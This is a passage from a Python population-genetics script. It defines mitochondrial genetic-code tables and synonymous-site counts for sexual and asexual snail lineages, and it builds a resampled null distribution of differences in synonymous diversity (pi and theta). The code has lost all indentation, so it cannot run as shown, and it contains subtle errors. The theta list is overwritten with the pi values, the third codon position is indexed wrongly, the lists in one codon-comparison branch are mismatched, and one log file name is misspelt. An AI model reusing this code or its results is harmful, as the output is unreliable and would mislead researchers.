'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'euplotidNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'C', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'bacterial':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'yeastNuc':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'S', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}, 'ascidianMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'G', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'G', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'flatwormMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': 'Y', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'chlorophyceanMt':{'CTT': 'L', 'TAG': 'L', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'R', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'R', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': '*', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
synSites = {">$Duluth":2591.52083333, ">$Heron2":2598, ">$McGregor":2599, ">$Waik36":2586.91666667, ">$WalesC":2584.91666667, ">$clone_1":2598, ">$AC51":2598.33333333, ">$Heron_mitochondrion":2599, ">$clone_7":2592.85416667, ">$Waik37":2586.58333333, ">$Gunn":2597.66666667, ">$DenmarkA":2593.125, ">$Waik372":2589.25, ">$Tarawera":2586.58333333, ">$Poerua_triploid":2597, ">$Kaniere_triploid":2586.58333333, ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":2593.79166667, ">$Brunner_2_4n":2593.60416674, ">$Brunner_6_3n":2592.9583334, ">$Grasmere_1_4n":2628.66666703, ">$Grasmere_6_3n":2599.62500001, ">$Poerua_72_4n":2605.47916675, ">$Rotoiti_1_4n":2594.35416672, ">$Kaniere_1_2n":2598.33333333, ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":2595, ">$Yellow_Contig_56":2592.33333333, ">$Alexsex":2592.33333333, ">$AlexMap":2592.33333333, ">$Lady":2598.66666667, ">$Ianthe":2597, ">$Rotoroa_1_2n":2598.58333338}
D1 = {'piS':[]} #πS
D2 = {'thetaS':[]} #thetaS
logfile = open('mt_nullDistribution_Synonymous.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
else:
outList.append(seq)
seqNums = range(len(popList))
currPCT = 0
sexN = 8
asexN = 23
sexAn = aN(sexN)
asexAn = aN(asexN)
logfile.write('Calculating population genetic parameters:\n')
logfile.close()
while len(D1['piS']) < 10000:
newPCT = int(round(100*len(D1['piS'])/10000.0))
if newPCT > currPCT:
logfile = open('mt_nullDistribution_Synonymous.log','a')
logfile.write('\t' + str(newPCT) + '% complete\n')
logfile.close()
currPCT = newPCT
sexList = []
asexList = []
while len(sexList) < sexN:
currNum = random.choice(seqNums)
if popList[currNum] not in sexList:
sexList.append(popList[currNum])
while len(asexList) < asexN:
currNum = random.choice(seqNums)
if popList[currNum] not in asexList and popList[currNum] not in sexList:
asexList.append(popList[currNum])
sexSynSites = 0.0
asexSynSites = 0.0
for sexual in sexList:
sexSynSites += synSites[sexual]
for asexual in asexList:
asexSynSites += synSites[asexual]
asexSynSites /= len(asexList)
sexSynSites /= len(sexList)
refSeq = seqDict[sexList[0]]
outSeq = seqDict[outList[0]]
outCodons = codonDict[outList[0]]
sex_sum2PQ_S = 0
sex_synS = 0
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in sexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
sex_synS += 1
sex_sum2PQ_S += twoPQ
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
sex_sum2PQ_S += twoPQ1
sex_synS += 1
elif aaList2[0] == aaList2[1]:
sex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
sex_sum2PQ_S += twoPQ1
sex_synS += 1
elif aaList2[0] == aaList2[1]:
sex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
sex_sum2PQ_S += twoPQ1
sex_synS += 1
elif aaList2[0] == aaList2[1]:
sex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
sex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
sex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
sex_sum2PQ_S += twoPQ1
sex_synS += 1
elif aaList2[0] == aaList2[1]:
sex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
sex_sum2PQ_S += twoPQ2
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
sex_synS += 2
sex_sum2PQ_S += (2*twoPQ)
i += 1
asex_sum2PQ_S = 0
asex_synS = 0
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
asex_synS += 1
asex_sum2PQ_S += twoPQ
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
asex_sum2PQ_S += twoPQ1
asex_synS += 1
elif aaList2[0] == aaList2[1]:
asex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
asex_sum2PQ_S += twoPQ1
asex_synS += 1
elif aaList2[0] == aaList2[1]:
asex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
asex_sum2PQ_S += twoPQ1
asex_synS += 1
elif aaList2[0] == aaList2[1]:
asex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
asex_sum2PQ_S += twoPQ1
asex_synS += 1
elif aaList2[0] == aaList2[1]:
asex_synS += 1
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
elif len(currAlleleDict) == 2:
currFreqDict = {}
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
twoPQ *= freq
currFreqDict[codon] = freq
if len(aaList) == 1:
asex_synS += 2
asex_sum2PQ_S += (2*twoPQ)
i += 1
sexPiS = (len(sexList)/(len(sexList)-1))*(sex_sum2PQ_S/sexSynSites)
asexPiS = (len(asexList)/(len(asexList)-1))*(asex_sum2PQ_S/asexSynSites)
sexThetaS = sex_synS/(sexAn*sexSynSites)
asexThetaS = asex_synS/(asexAn*asexSynSites)
D1_syn = asexPiS - sexPiS #π synonymous
D2_syn = asexThetaS - sexThetaS #theta synonymous
currD1_syn = D1['piS']
currD2_syn = D2['thetaS']
currD1_syn.append(D1_syn)
currD2_syn.append(D2_syn)
D1['piS'] = currD1_syn
D2['thetaS'] = currD1_syn
logfile = open('mt_nullDistribution_Synonymous.log','a')
logfile.write('Finished calculating population genetic parameters\nSorting Population Genetic Parameters\n')
logfile.close()
sortedD1_syn = sorted(D1['piS'])
logfile = open('mt_nullDistribution_Synonymous.log','a')
logfile.write('\t' + str(round(100*(1.0/2))) + '% complete\n')
logfile.close()
sortedD2_syn = sorted(D2['thetaS'])
logfile = open('mt_nullDistribution_Synonymouss.log','a')
logfile.write('\t' + str(round(100*(2.0/2))) + '% complete\n')
logfile.close()
logfile = open('mt_nullDistribution_Synonymous.log','a')
logfile.write('Finished sorting population genetic parameters\nWriting output to standard out\n')
i = 0
sys.stdout.write('πS D\tthetaS D\n')
logfile.close()
while i < 10000:
sys.stdout.write(str(sortedD1_syn[i]) + '\t' + str(sortedD2_syn[i]) + '\n')
i += 1
logfile.close()
def CRI(aaList):
aaSchemeList = [1,2,3,4,5,6,7]
aaSchemeDict = {1:{("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"C",("A","Y"):"C",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"C",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"C",("N","Y"):"C",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"C",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"C",("C","Y"):"C",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"C",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",(